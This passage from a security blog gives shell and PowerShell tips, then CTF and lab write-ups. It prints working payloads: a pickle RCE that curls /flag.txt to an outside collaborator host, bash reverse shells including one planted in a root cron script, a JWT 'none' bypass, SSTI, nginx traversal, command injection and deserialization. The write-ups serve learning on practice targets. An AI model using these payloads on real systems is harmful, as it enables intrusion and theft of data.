- 0 0 * * 7 /path/to/script
Every Weekday at 4 AM
- 0 4 * * 1-5 /path/to/script
At 4 AM on Tuesdays and Thursdays
- 0 4 * * 2,4 /path/to/script
Every 20 Minutes - Multiple Scripts
- */20 * * * * /path/to/script1; /path/to/script2

Cron job syntax

Crontabs use the following flags for adding and listing cron jobs.

crontab -e
- edits crontab entries to add, delete, or edit cron jobs.
crontab -l
- list all the cron jobs for the current user.

Reference:

Loops

You can also use an infinite loop with a sleep command to run the script at specific intervals.

Bash:

while :
do
    ./monitor.sh # Your script logic here
    sleep 3600   # Wait for 1 hour
done

PowerShell:

while ($true) {
    # Your script logic here
    Start-Sleep -Seconds (4 * 24 * 60 * 60)  # Wait for 4 days
}

Thank you for reading this far. Happy hacking!

Customize Windows command prompt like Kali Linux

Tue, 09 Jul 2024 00:00:00 +0000

In PowerShell, you can use the ESC[m sequence to set the format of the screen and text. The number represents different formatting modes.

Reference: Text Formatting

$([char]27) is an ASCII character representing an escape character, and the code 0 for will reset all attributes to the default state.

Code 32 will set Foreground to Green.

echo "$([char]27)[32m Green Colour text $([char]27)[0m"

To see all the available colours run the following powershell code:

$Colors = '30','31','32','33','34','35','36','37','38','39','90','91','92','93','94','95','96','97'
foreach ($Color in $Colors)
{
    echo "$([char]27)[$($Color)m colour code $($Color) $([char]27)[0m"
}

The “`r`n” sequence is eqivalent to \n newline character. Environment variable $env:UserName and $env:COMPUTERNAME will print the username and computer name.

additionaly we can set the variable for $([char]27).

$ESC = [char]27

To test this, run the following command:

echo "`r`n$ESC[32m┌──PS($ESC[94m$env:UserName@$env:COMPUTERNAME$ESC[32m)-[$ESC[0m$(Get-Location)$ESC[32m]`r`n└─$ESC[94m$ $ESC[0m"

Now use the prompt function in PowerShell to set the command prompt prefix.

$ESC = [char]27
function prompt { "`r`n$ESC[32m┌──PS($ESC[94m$env:UserName@$env:COMPUTERNAME$ESC[32m)-[$ESC[0m$(Get-Location)$ESC[32m]`r`n└─$ESC[94m$ $ESC[0m" }

That’s it, Now we have a Kali Linux-like command prompt.

Additionally, you can add it to the PowerShell profile path to make it run at startup.

To get the profile path run:

$PROFILE.AllUsersAllHosts

If you want to replace the Current User’s Home directory with the ~ sign in the path, use the following command:

$ESC = [char]27
function prompt { "`r`n$ESC[32m┌──PS($ESC[94m$env:UserName@$env:COMPUTERNAME$ESC$ESC[32m)-[$ESC[0m$($(Get-Location) -replace "^$([regex]::Escape($HOME+"\"))", '~\' -replace "^$([regex]::Escape($HOME))", '~')$ESC[32m]`r`n└─$ESC[94m$ $ESC[0m" }

Happy Hacking

Neonify - HackTheBox

Wed, 19 Jun 2024 00:00:00 +0000

Challenge Description

It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Source Code

This is a simple web application written in Ruby. It will take the user input using the POST method and render it using a template.

But to achieve Template Injection, We need to pass the regex check else it will only render “Malicious Input Detected” and not our input.
The regex is /^[0-9a-z ]+$/i. It will check if the input is alphanumerical and spaces.

Bypass The Regex Check

After a bit of research on Regular Expressions in Ruby, ^ Matches the beginning of a line, and $ Matches the end of a line. This means the regex won’t match anything after the new line.

Reference: https://ruby-doc.com/docs/ProgrammingRuby/html/language.html#UL

Now, We can give our payload after the %0a(URL encoded new line character).
To read the file using Template-Injection, we can use a payload like <%= File.open('flag.txt').read %>

Flag: HTB{r3pl4c3m3n7_s3cur1ty}

Happy Hacking

Basic Challenge Level 8

Wed, 08 May 2024 17:30:00 +0000

Description:

Sam remains confident that an obscured password file is still the best idea, but he screwed up with the calendar program in Basic 7. This time he has saved the unencrypted password file in /var/www/hackthissite.org/html/missions/basic/8/. Also, Sam’s young daughter Stephanie has just learned to program in PHP. She’s talented for her age, but she knows nothing about security. She recently learned about saving files, & she wrote a script to demonstrate her ability.

Requirements: SSI knowledge.

Hints:

This challenge’s logic is similar to Basic 7, but instead of UNIX commands it uses SSI.
When you play with Stephanie’s script, pay attention to which directory the page that displays your input is in, & remember which directory the description told you that the password file is in.

Difficulty: Easy.

Points: 40

Challenge Link: https://www.hackthissite.org/missions/basic/8

Forum Link: https://www.hackthissite.org/forums/viewforum.php?f=14&t=10754

Solution:

From the description and requirements, we can get the idea that the SSI (Server Side Includes) directives are being used to generate dynamic content at the server side.

Here we can control the name input that is placed inside the file that have the .shtml extension so SSI injection can be possible.

We can use payload like “” to list the files but generated file are in “missions/basic/8/tmp/” directory but the password file that we are looking for is in “missions/basic/8/” directory so we have to go one step up. The payload:

Output:

Visiting the path of “au12ha39vc.php” file we get the password for this challenge.

Happy Hacking

Basic Challenge Level 7

Wed, 08 May 2024 16:30:00 +0000

Description:

This time Sam has saved the unencrypted password in an obscurely named file saved in the challenge’s directory. In other unrelated news, Sam has set up a script that returns the output from the UNIX cal command.

Requirements:

Basic knowledge of UNIX commands.

Hints:

Remember, you need to find a way to see the files in the challenge’s directory.

The calendar script takes user input & runs the cal command with it. What if you could inject another command?

How can you separate commands in UNIX?

Difficulty: Easy.

Points: 35

Challenge Link: https://www.hackthissite.org/missions/basic/7

Forum Link:

https://www.hackthissite.org/forums/viewforum.php?f=14&t=10753

Solution:

The script will return the output from the UNIX cal command. In UNIX if our input is directly appended to the cal command than we can inject our own command using “&&” sequence and to list the files in the directory we can use ls command.

So to create a payload we have to pass a valid year + && + ls.

2022 && ls

In this output we can see the obscurely named unencrypted password file k1kh31b1n55h.php, visiting this path we get the password for this challenge.

Happy Hacking

Basic Challenge Level 6

Wed, 08 May 2024 15:30:00 +0000

Description:

Sam has encrypted his password. The encryption system is publicly accessible.

Requirements:

General Cryptography knowledge & common sense.

Hints:

Try encrypting some characters, to figure out how the encryption algorithm works. Start simple, like, try a small string consisting of the same character.

Difficulty: Easy.

Points: 30

Challenge Link: https://www.hackthissite.org/missions/basic/6

Forum Link:

https://www.hackthissite.org/forums/viewforum.php?f=14&t=10752

Solution:

In this challenge we have encrypted password and we can encrypt our own password.

By encrypting simple string like ‘aaaa’ we get the encrypted version ‘abcd’ from this pattern we can guess that the encryption algorithm is incrementing each character by one ASCII number in ascending order. We can write simple python programme to decrypt the encrypted password.

print('Decrypted password: ', end='') a = "dgg<=g=8" for i in range(len(a)): print(chr(ord(a[i])-i), end="")
Decrypted password: dfe99b71

Happy Hacking

Basic Challenge Level 5

Wed, 08 May 2024 14:30:00 +0000

Description:

Sam has gotten wise to all the people who wrote their own forms to get the password. Rather than actually learning the password, he decided to make his email program a little more secure.

Requirements:

HTML knowledge & an email address.

Hints:

The script sends the password to the administrator, but… who says it has to go to the administrator?

Difficulty: Easy.

Points: 25

Challenge Link: https://www.hackthissite.org/missions/basic/5

Forum Link:

https://www.hackthissite.org/forums/viewforum.php?f=14&t=10750

Solution:

Looking in the HTML source code for “Send password to Sam” form we find the one interesting hidden input field with name=“to” value=“sam@hackthissite.org”.

It seems that server will send the password to this email so we can change this to our own email address and we can receive the password.

And we successfully received the email with password.

Note: the email will only be sent if you provide your HackThisSite profile email address.

Happy Hacking

Basic Challenge Level 4

Tue, 07 May 2024 16:30:00 +0000

Description:

This time Sam hardcoded the password into the script. However, the password is long & complex, & Sam is often forgetful. So he wrote a script that would email his password to him automatically, in case he forgets it.

Requirements:

HTML knowledge & an email address.

Hints:

The script sends the password to the administrator, but… who says it has to go to the administrator?

Difficulty: Easy.

Points: 20

Challenge Link: https://www.hackthissite.org/missions/basic/4

Forum Link:

https://www.hackthissite.org/forums/viewforum.php?f=14&t=10749

Solution:

Looking in the HTML source code for “Send password to Sam” form we find the one interesting hidden input field with name=“to” value=“sam@hackthissite.org”.

It seems that server will send the password to this email so we can change this to our own email address and we can receive the password.

And we successfully received the email with password.

Note: the email will only be sent if you provide your HackThisSite profile email address.

Happy Hacking

Basic Challenge Level 3

Tue, 07 May 2024 14:30:00 +0000

Description:

This time Sam remembered to upload the password file, but there were deeper problems than that.

Requirements:

Basic knowledge of HTML & directory structure understanding.

Hints:

This time Sam remembered to upload the password file, so… maybe you can find it?

Difficulty: Easy.

Points: 15

Challenge Link: https://www.hackthissite.org/missions/basic/3

Forum Link:

https://www.hackthissite.org/forums/viewforum.php?f=14&t=10748

Solution:

Looking in the HTML source code for password submit form we find the one interesting hidden input field with name=“file” value=“password.php”.

Looks like the password file that Sam uploaded. Visiting this path, we can access the password.php file and it gives us the password that we are looking for.

Happy Hacking

Basic Challenge Level 2

Tue, 07 May 2024 11:30:00 +0000

Description:

Network Security Sam set up a password protection script. He made it load the real password from an unencrypted text file & compare it to the password the user enters. However, he neglected to upload the password file…

Requirements: Common sense.

Hints:

Read the description carefully.

If the password file is missing, what is the password you submit being compared to?

Difficulty: Easy.

Points: 10

Challenge Link: https://www.hackthissite.org/missions/basic/2

Forum Link:

https://www.hackthissite.org/forums/viewforum.php?f=14&t=10747

Solution:

As we can see in the description that the password file was not uploaded so just submitting the NULL (empty) password will do the trick.

Happy Hacking

Basic Challenge Level 1: the idiot test

Tue, 07 May 2024 09:30:00 +0000

Description:

This level is what we call “The Idiot Test”. If you can’t complete it, don’t give up on learning all you can!

Requirements:

Basic knowledge of HTML.

Hints:

Don’t overthink it.

To pass this challenge you need to find & submit its hidden password, not your account’s password.

Difficulty: Easy.

Points: 5

Challenge Link: https://www.hackthissite.org/missions/basic/1

Forum Link:

https://www.hackthissite.org/forums/viewforum.php?f=14&t=10746

Solution:

The password is hidden in HTML source code. The challenge talks about HTML knowledge so it is good indicator to check the HTML source code.

Happy Hacking

Wizer CTF Event 6 Hour Challenge

Thu, 08 Feb 2024 00:00:00 +0000

Start Time: 4 February 2024, 10 AM Eastern Time

End Time: 4 February 2024, 4 PM Eastern Time

This CTF focuses on secure coding, we are given the source code for each challenge to analyse.

JWT Authentication

Source code:

const express = require('express'); const jwt = require('jsonwebtoken'); const bodyParser = require('body-parser'); const app = express(); app.use(bodyParser.json()); const SECRETKEY = process.env.SECRETKEY; // Middleware to verify JWT token // This API will be used by various microservices. These all pass in the authorization token. // However the token may be in various different payloads. // That's why we've decided to allow all JWT algorithms to be used. app.use((req, res, next) => { const token = req.body.token; if (!token) { return res.status(401).json({ message: 'Token missing' }); } try { // Verify the token using the secret key and support all JWT algorithms const decoded = jwt.verify(token, SECRETKEY, { algorithms: ['HS256', 'HS384', 'HS512', 'RS256', 'RS384', 'RS512', 'ES256', 'NONE', 'ES384', 'ES512', 'PS256', 'PS384', 'PS512'] }); req.auth = decoded; next(); } catch (err) { return res.status(403).json({ message: 'Token invalid' }); } }); // API route protected by our authentication middleware app.post('/flag', (req, res) => { if (req.auth.access.includes('flag')) { res.json({ message: 'If you can make the server return this message, then you've solved the challenge!'}); } else { res.status(403).json({ message: '🚨 🚨 🚨 You've been caught by the access control police! 🚓 🚓 🚓' }) } }); app.listen(3000, () => { console.log(`Server is running on port 3000`); });
This app will check if the token parameter is present in the request body’s JSON data.

If token is present it will Verify the JWT token.

Reference for JSON web tokens (JWTs): https://portswigger.net/web-security/jwt.

It support all JWT algorithms including NONE to verify JWT token, so we can bypass the verification using NONE as algorithm. It will accept tokens that have no signature at all.
Then it will check if {"access":"flag"} is present in jwt payload data.

A JWT consists of 3 parts: a header, a payload, and a signature. These are each base64 encoded and separated by a dot.
now we create jwt token with HEADER (ALGORITHM & TOKEN TYPE): {"typ":"JWT","alg":"NONE"} and PAYLOAD (DATA): {"access":"flag"} with blank SIGNATURE.

Payload:

{"token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0.eyJhY2Nlc3MiOiJmbGFnIn0."}

Nginx Configuration

Through the Shelldon Cooper’s flag game website, with the following nginx configuration, get the flag from flag.html

Source code:

user nginx; worker_processes 1; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; location / { # Allow the index.html file to be read root /usr/share/nginx/html; index index.html; } location /assets { # Allow the assets to be read alias /usr/share/nginx/html/assets/; } location = /flag.html { # The flag file is private deny all; } error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } } }
At first, I didn’t really know what to do, so I used the CTF Ninja Technique. I googled “nginx configuration ctf” and came across the “off-by-slash” vulnerability.

When a Nginx directive does not end with a slash, it is possible to traverse one step up. This incorrect configuration could allow an attacker to read file stored outside the target folder.

Here the location /assets don’t have the trailing slash, so we can read the files in it’s parent folder.

Nginx alias directive defines a replacement for the specified location. Here /assets is alias of /usr/share/nginx/html/assets/.
So /assets../flag.html will become /usr/share/nginx/html/assets/../flag.html and it will return the contents of flag.html.

Payload:

https://nginx.wizer-ctf.com/assets../flag.html

Recipe Book

Inject an alert(“Wizer”)

Source code:

const express = require('express'); const helmet = require('helmet'); const app = express(); const port = 80; // Serve static files from the 'public' directory app.use(express.static('public')); app.use( helmet.contentSecurityPolicy({ directives: { defaultSrc: ["'self'"], scriptSrc: ["'self'", ], styleSrc: ["'self'", "'unsafe-inline'", 'maxcdn.bootstrapcdn.com'], workerSrc: ["'self'"] // Add other directives as needed }, }) ); // Sample recipe data const recipes = [ { id: 1, title: "Spaghetti Carbonara", ingredients: "Pasta, eggs, cheese, bacon", instructions: "Cook pasta. Mix eggs, cheese, and bacon. Combine and serve.", image: "spaghetti.png" }, { id: 2, title: "Chicken Alfredo", ingredients: "Chicken, fettuccine, cream sauce, Parmesan cheese", instructions: "Cook chicken. Prepare fettuccine. Mix with cream sauce and cheese.", image: "chicken_alfredo.png" }, // Add more recipes here ]; // Enable CORS (Cross-Origin Resource Sharing) for local testing app.use((req, res, next) => { res.header("Access-Control-Allow-Origin", "*"); res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept"); next(); }); // Endpoint to get all recipes app.get('/api/recipes', (req, res) => { res.json({ recipes }); }); app.listen(port, () => { console.log(`API server is running on port ${port}`); });
Url: https://events.wizer-ctf.com/

In the webpage there is a https://events.wizer-ctf.com/app.js. when we analyse it, we notice that it will Get the “mode” and “color” GET parameters from url and assign it to modeParam and colorParam.

Then it will set document.getElementById("mode").children[0].id = modeParam; and document.getElementById(modeParam).textContent = colorParam;

Here if we put GET parameter mode=sw then we can control the value of const sw it will be what we give in GET parameter color.

explanation:

Parameter Retrieval:

modeParam = searchParams.get('mode'):

Stores the value of the query parameter named mode in the modeParam variable.

colorParam = searchParams.get("color"):

Similarly, retrieves the value of the color parameter and stores it in colorParam.

Element Updates:

document.getElementById("mode").children[0].id = modeParam;:

Finds the element with the ID “mode” and targets its first child element.

Sets the id attribute of the child element to the value of modeParam.

document.getElementById(modeParam).textContent = colorParam;:

Uses the value of modeParam to look up an element by its ID.

Sets the textContent of that element to the value of colorParam.

Service Worker Registration:

sw = document.getElementById('sw').innerText;:

Retrieves the innerText (text content) of the element with the ID “sw”.

Stores the retrieved content in the sw variable.

https://events.wizer-ctf.com/sw.js?sw= have the following code:

// Allow loading in of service workers dynamically importScripts('/utils.js'); importScripts(`/${getParameterByName('sw')}`);
It will import the serviceWorker from the value of sw since we can control it we can import our own serviceWorker with sw=\\atacker.com/sw.js.
This will get the file from https://atacker.com/sw.js.

now to craft our serviceWorker take a look at this.

this will listen for message event on BroadcastChannel(‘recipebook’) and it will alert the message property of a message.

BroadcastChannel enables communication between different windows, tabs, or workers within the same origin. postMessage() method will trigger the ‘message’ event on other instances of the BroadcastChannel with the same name.

so in serviceWorker we create a new BroadcastChannel instance using the same name (‘recipebook’):
const channel = new BroadcastChannel('recipebook');
Use the postMessage() method on the BroadcastChannel instance to send a message with a message property:
channel.postMessage({ message: 'Wizer' });

serviceWorker payload:

const channel = new BroadcastChannel('recipebook'); channel.postMessage({ message: 'Wizer' });
upload this file publicaly on internet: https://aftab700.pythonanywhere.com/api/xss

Payload:

https://events.wizer-ctf.com/?mode=sw&color=\\aftab700.pythonanywhere.com/api/xss

Profile Page

Get the flag and submit it here (https://dsw3qg.wizer-ctf.com/submit_flag/) to win the challenge! (profile page: https://dsw3qg.wizer-ctf.com/profile)

Source code:

from flask import Flask, request, render_template import pickle import base64 app = Flask(__name__, template_folder='templates') real_flag = '' with open('/flag.txt') as flag_file: real_flag = flag_file.read().strip() class Profile: def __init__(self, username, email, bio): self.username = username self.email = email self.bio = bio @app.route('/profile', methods=['GET', 'POST']) def profile(): if request.method == 'POST': username = request.form.get('username') email = request.form.get('email') bio = request.form.get('bio') if username and email and bio: profile = Profile(username, email, bio) dumped = base64.b64encode(pickle.dumps(profile)).decode() return render_template('profile.html', profile=profile, dumped=dumped) load_object = request.args.get('load_object') if load_object: try: profile = pickle.loads(base64.b64decode(load_object)) return render_template('profile.html', profile=profile, dumped=load_object) except pickle.UnpicklingError as e: return f"Error loading profile: {str(e)}", 400 return render_template('input.html') @app.route('/submit_flag/', methods=['GET']) def flag(flag): return real_flag if flag == real_flag else 'Not correct!' if __name__ == '__main__': app.run(debug=True)

Here if GET parameter load_object is present it will pass it to pickle.loads(base64.b64decode(load_object)).

pickle.loads() is used to unpickle (deserialize) the data and takes a variable containing byte stream as a valid argument.

It is vulnerable to pickle insecure deserialization.

To exploit this vulnerability, we will use __reduce__ method.
__reduce__ allows you to define a custom way to reconstruct the object during deserialization. It can be used for execution of arbitrary code during deserialization.

I wasted so much time on payload making because i was using os.system but it didn’t work at last subprocess.Popen worked.

[!NOTE] It won’t work because os.system method uses respective shell of the Operating system that it is running on so for os.system to work during Deserialization we need to Serialize the payload on the machine that matches the target OS.
Here target is running Linux so Windows won’t work

python exploit code:

import pickle import base64 import os import requests class RCE: def __reduce__(self): import os import subprocess return (subprocess.Popen, (('curl','bwb2r04nf32cz2y75mho7eus4jaay8mx.oastify.com', '-d', '@/flag.txt'),0)) pickled = pickle.dumps(RCE()) x2 = base64.b64encode(pickled).decode() r = requests.get(f"https://dsw3qg.wizer-ctf.com/profile?load_object={x2}",proxies={'http':'http://127.0.0.1:8080'}) print(r.text)
Request to collaborator:

Payload:

https://dsw3qg.wizer-ctf.com/submit_flag/WIZER{'PICKL1NG_1S_DANGEROUS'}

made it to the top 10.

Happy Hacking

Academy Box - PEH Capstone TCM Security

Sun, 04 Feb 2024 00:00:00 +0000

Writeup for Academy machine challenge from PEH course of TCM Security

Challenge File: https://drive.google.com/drive/folders/1VXEuyySgzsSo-MYmyCareTnJ5rAeVKeH

Run sudo netdiscover -r 192.168.0.0/24 before starting the target VM to capture all available devices in subnet
now start the target VM and wait for new machine IP entry it will be the IP of our target VM.

Before starting the target VM.

After starting the target VM.

Now that we have the target IP 192.168.0.113 let’s run the nmap.

┌──(Jack㉿Sparrow)-[~/Downloads] └─$ nmap -sC -sV -T5 192.168.0.113 -oA nmap_Academy.txt -Pn Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-02 13:58 EST Warning: 192.168.0.113 giving up on port because retransmission cap hit (2). Nmap scan report for 192.168.0.113 Host is up (0.0050s latency). Not shown: 993 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.0.207 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 c744588690fde4de5b0dbf078d055dd7 (RSA) | 256 78ec470f0f53aaa6054884809476a623 (ECDSA) |_ 256 999c3911dd3553a0291120c7f8bf71a4 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.38 (Debian) 1046/tcp filtered wfremotertm 1055/tcp filtered ansyslmd 1434/tcp filtered ms-sql-m 2038/tcp filtered objectmanager Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds
Here we see that port 21,22,80 are open.

In port 21 Anonymous FTP login is allowed
to see what files are present in this ftp we can open ftp://192.168.0.113/ in windows File Explorer or we can also use curl

The note says The StudentRegno number is what you use for login which is 10201321 and we have one password hash cd73502828457d15655bbd7a63fb0bc8. use tools like https://crackstation.net/ to crack the hash.
This is md5 of student.
now we have login credentials 10201321:student note this for now and let’s move to http site.

http://192.168.0.113/ is Apache2 Debian Default Page.

There is nothing much to see in this default page so let’s do the directory brute force.

┌──(Jack㉿Sparrow)-[~] └─$ dirsearch -u http://192.168.0.113/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 141672 Output File: /home/kali/.dirsearch/reports/192.168.0.113/-_24-02-04_03-17-49.txt Error Log: /home/kali/.dirsearch/logs/errors-24-02-04_03-17-49.log Target: http://192.168.0.113/ [03:17:49] Starting: [03:18:19] 301 - 319B - /phpmyadmin -> http://192.168.0.113/phpmyadmin/ [03:19:57] 301 - 316B - /academy -> http://192.168.0.113/academy/ Task Completed
We found the /phpmyadmin/ and /academy/ directories on the http://192.168.0.113/academy/ page we have one login form.

Let’s try the login credentials 10201321:student that we found previously from ftp note.

It worked we are now logged in.
On the My Profile page we have file upload functionality.

try uploading simple php shell and it is not blocked we now have the ability to execute commands on server.

we can get reverse shell by this payload cmd=bash+-c+"bash+-i+>%26+/dev/tcp/192.168.0.207/9001+0>%261"
reference: https://www.revshells.com

In the config.php file we have the mysql_password My_V3ryS3cur3_P4ss and in the ftp note we show line I told him not to use the same password everywhere which implies that user Grimmie is reusing the same password so we can try to use this password to switch to user Grimmie.

looking at crontab we notice that /home/grimmie/backup.sh file is running as root and we can modify this file to get root access.

Reverse shell payload to get shell as root:

echo 'bash -c "bash -i >& /dev/tcp/192.168.0.207/9002 0>&1"' > backup.sh

Flag:

Happy Hacking

Toxic - HackTheBox

Wed, 24 Jan 2024 00:00:00 +0000

Challenge Description

Humanity has exploited our allies, the dart frogs, for far too long, take back the freedom of our lovely poisonous friends. Malicious input is out of the question when dart frogs meet industrialisation. 🐸

Insecure Deserialization

In the given source code we can spot that it is vulnerable to deserialization.

PageModel have magic method __destruct() to exploite Deserialization.

payload=

O:9:"PageModel":1:{s:4:"file";s:11:"/etc/passwd";}
import requests from itsdangerous import base64_encode a = "PageModel" b = "/etc/passwd" payload = 'O:'+str(len(a))+':"'+a+'":1:{s:4:"file";s:'+str(len(b))+':"'+b+'";}' payload = base64_encode(payload).decode() r = requests.get("http://83.136.249.57:52345/",cookies={"PHPSESSID": payload},proxies={"http":"http://127.0.0.1:8080/"}) print(r.text)
The flag’s name is random, so we need to find an alternative way to read it.

PHP code Injection in log file

We can find the path of /etc/nginx/nginx.conf in Dockerfile.

Reading this file using the deserialization payload it reveals the path to access log /var/log/nginx/access.log.

By analyzing the access log, we can see that the User-agent is recorded in the log file.

We can attempt to insert PHP code into this log file and then read the file to determine whether the PHP code is executed.

and this works. Now we can use this PHP code injection to obtain the flag.

Flag: HTB{P0i5on_1n_Cyb3r_W4rF4R3?!}

Happy Hacking

Lost Modulus - HackTheBox

Sun, 31 Dec 2023 00:00:00 +0000

Challenge Description: I encrypted a secret message with RSA but I lost the modulus. Can you help me recover it?

In the file given challenge.py we can see that it is RSA encryption and the value of e is 3.
Here the e is small and n is too large, so m^e < N.
When the value of e is as small as 3, we can just do the 3rd root of cipher text and we can get the message.

Python code:

import gmpy2 from Crypto.Util.number import long_to_bytes cipher = int( "05c61636499a82088bf4388203a93e67bf046f8c49f62857681ec9aaaa40b4772933e0abc83e938c84ff8e67e5ad85bd6eca167585b0cc03eb1333b1b1462d9d7c25f44e53bcb568f0f05219c0147f7dc3cbad45dec2f34f03bcadcbba866dd0c566035c8122d68255ada7d18954ad604965", 16, ) with gmpy2.local_context(gmpy2.context(), precision=800) as ctx: ctx.precision += 800 croot = gmpy2.cbrt(cipher) print(long_to_bytes(int(croot)))
Flag: HTB{n3v3r_us3_sm4ll_3xp0n3n7s_f0r_rs4}

Happy Hacking

RLotto - HackTheBox

Fri, 29 Dec 2023 00:00:00 +0000

Challenge Description: Are you ready to win lottery? Guess the Random Lotto Numbers. It’s TIME you become a millionaire.

In the given code we can see that it is using seed = int(time.time()) to generate 5 random digits using random.randint(1, 90)
It will give us the first 5 random digits and we have to guess next 5 to get the flag.

Because we have the first 5 random generated digits we can brute force the seed. Initial seed value would be time.time() befor we connect to server and incriment it by one.
when we get the seed we can generate the next 5 digits.

python code:

import time import random # seed = int(time.time()) seed = 1703848677 def find_solution(s_extracted): global seed s_extracted = [int(i) for i in s_extracted.split(" ")] while True: random.seed(seed) extracted = [] while len(extracted) < 5: r = random.randint(1, 90) if(r not in extracted): extracted.append(r) if extracted == s_extracted: print(seed) break seed += 1 solution = "" next_five = [] while len(next_five) < 5: r = random.randint(1, 90) if(r not in next_five): next_five.append(r) solution += str(r) + " " solution = solution.strip() print("[+] SOLUTION: " + solution) pass find_solution("40 8 6 17 63") # [+] EXTRACTION Value
Flag: HTB{n3v3r_u53_pr3d1c74bl3_533d5_1n_p53ud0-r4nd0m_numb3r_63n3r470r}

Happy Hacking

CyberHavoc CTF 2023

Mon, 18 Dec 2023 00:00:00 +0000

https://ctf.cyberhavoc.in/

FLAG FORMAT: CHCTF{}

Reverse Engineering

Start The Dos

DESCRIPTION : Leon wants you to be a part of Agents of Havoc. He wants you to understand this software as old as hacking itself so as to fire a DoS Attack against whiterose’s targets. Help him before he suspects your intentions.

file: dosser.s

if look in this assembly code we can see that it is checking characters one by on like this:

mov al, [esi] cmp al, 0o114 jne cmp_fail inc esi
we can get flag by converting all this values we get from assembly cmp

python code to do that:

print("CHCTF{", end='') for i in [0o114, 0o63, 0o63, 0o124, 0o137, 0o103, 0o122, 0o64, 0o103, 0o113, 0o63, 0o122, 0o137, 0o65, 0o124, 0o122, 0o61, 0o113, 0o63, 0o123, 0o137, 0o64, 0o107, 0o64, 0o61, 0o116]: print(chr(i), end='') print("}")
flag: CHCTF{L33T_CR4CK3R_5TR1K3S_4G41N}
Crypto

The Beginning Of All

DESCRIPTION:

I was working on my laptop when my laptop suddenly glitched. I discussed it with my friends and to our surprise we all had the same color glitch. I guess it has to do something with the odd behavior of the people around me.

Remember the flag format!

file: glitches.mp4

When i first open this file it is just some random frames of color of 3x2 matrix. so i just googled “color code cipher ctf” and got this link:

https://www.dcode.fr/hexahue-cipher

After decoding we get this: CHCTF5URR3ND3R 0R 5UFF3R

flag: CHCTF{5URR3ND3R_0R_5UFF3R}
Leaked Convo

given text:

duv#r!|"rG Xrr} (|$! %|vpr y|&; Znxr "$!r {| |{r urn!" $"; a(!ryyG N!r (|$ q|{r &v#u (|$! "r#$}L Yr|{G R%r!(#uv{t v" "r#; aur }n(y|nq" n!r "r#; aur #n!tr#" n!r sv'rq; V#â" w$"# n zn##r! |s #vzr {|&. duv#r!|"rG aur p|{pr}# |s &nv#v{t or&vyqr!" zr; ]b]T`*>DBlD>g@lD=lBDArDlDb@lWAr,; dr {rrq #| xrr} !|#n#v{t |$! p|{%r!"n#v|{ "| #un# {|#uv{t tr#" yrnxrq; a(!ryyG [|#rq.
It is rot 47 with n=81. and flag is in rot13.

flag: CHCTF{175_71M3_70_574r7_7H3_W4r}
Top Password

DESCRIPTION: Out of nowhere, Leon signaled something to Cisco. Kind of some secret language. Since Leon is out of his place, why not a peek-a-boo into his room? I climbed to the 2nd floor to his room where I found his Tablet charging and a note pinned on the board. Maybe that’s the password for the tablet. I NEED THAT!

file: image.png

cipher text: WXERGT_CSZWQWREGIYQZ

given image is French Sign Language which decode to : JUMPINGEVENSTEPSONLY

It is hill cipher. the matrix number values are (2, 4, 6, 8) from the JUMPINGEVENSTEPSONLY and alphabet 27 character.

decoded text: DESTRUCTION_AT_PEAK_

flag: CHCTF{DESTRUCTION_AT_PEAK}
Digital Forensics

The Cryptic Sound

file: Right or Wrong.wav

it is morse code in audio

tool used: https://morsecode.world/international/decoder/audio-decoder-adaptive.html

flag: CHCTF{BONSOIRELLIOT}
Dump Digging

file: Is it True.pcapng

there is one png file zero or one.png to extract it open Wireshark

File > Export Objects > HTTP and select file and save.

inside this jpg image there is hexdump data

copy that and convert to raw data and save and change the header to 89 50 4E 47 0D 0A 1A 0A and save as .png there is flag in this image.

flag: CHCTF{Th3_most_pow3rful_motivator_in_th3_world_is_r3v3ng3}
Web

Tyrell’s Password Maze

in HTML source code we can see this js:

